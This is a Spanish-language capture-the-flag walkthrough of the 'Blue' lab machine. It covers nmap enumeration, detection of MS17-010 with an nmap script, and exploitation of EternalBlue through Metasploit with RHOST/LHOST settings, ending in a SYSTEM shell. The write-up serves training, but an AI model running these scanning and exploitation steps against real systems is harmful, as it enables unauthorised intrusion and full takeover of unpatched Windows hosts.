

## Descripción

Esta máquina es otra máquina ideal pera personas que están cursando la certificación **eJPTv2** o para personas que están iniciando en el hacking

Esta máquina cubre una enumeración y explotación bastante fácil, cubre una vulnerabilidad muy conocida de windows y que no es muy complicada de explotar

Herramientas empleadas en esta máquina

- NMAP y NMAP scripts
- METASPLOIT

## **Enumeración**

Hacemos un escaneo para ver los puertos abiertos que tiene la máquina víctima

```
sudo nmap -p- --min-rate 5000 -sCV 10.10.10.40 -oN blue
```

```
PORT STATE SERVICE VERSION

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn

445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)

49152/tcp open msrpc Microsoft Windows RPC

49153/tcp open msrpc Microsoft Windows RPC

49154/tcp open msrpc Microsoft Windows RPC

49155/tcp open msrpc Microsoft Windows RPC

49156/tcp open msrpc Microsoft Windows RPC

49157/tcp open msrpc Microsoft Windows RPC

Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
```

En este fragmento del escaneo podemos ver información bastante relevante, como el sistema operativo de la víctima (Windows), la versión exacta (7 profesional)

También podemos ver el nombre del host HARIS-PC

También una puerto clave para vulnerar esta máquina es el puerto 445, tenemos smb

Al tener smb activo y tener un sistema operativo **Windows 7** podemos buscar la vulnerabilidad **EternalBlue** 

## Detección de Eternalblue

Vamos a usar el siguiente script de NMAP para detectar esta vulnerabilidad

```
sudo nmap -p 445 --script=smb-vuln-ms17-010 10.10.40
```

```
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
```

Y efectivamente la versión es vulnerable a **EternalBlue** 

## **Explotación**

En Metasploit tenemos un módulo para explotar Eternalblue

# EN METASPLOIT search eternalblue

0 exploit/windows/smb/ms17\_010\_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

Ahora configuramos el módulo y lanzamos el exploit

```
<u>msf6</u> exploit(windows/smb/ms17_010_eternalblt)> set RHOST 10.10.10.40
RHOST => 10.10.10.40
<u>msf6</u> exploit(windows/smb/ms17_010_eternalblt)> set LHOST 10.10.16.21
LHOST => 10.10.16.21
<u>msf6</u> exploit(windows/smb/ms17_010_eternalblt)>
```

Al lanzar el exploit tendremos una sesión con privilegios

C:\Windows\system32>whoami whoami nt authority\system

Ahora nos quedará buscar la rootflag y la userflag